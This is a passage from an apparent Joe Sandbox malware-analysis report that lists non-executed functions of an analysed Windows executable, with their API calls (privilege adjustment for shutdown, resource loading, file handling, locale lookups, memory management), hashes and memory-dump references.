                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4190037839-2401316094
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0062F9F8,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,0062F9F8,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0062D0D0,?,00000000,00008000,0062F9F8,00000000,00401AB4), ref: 00401A79
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3782394904-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExitMessageProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1220098344-1503883590
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 262959230-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 730355536-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
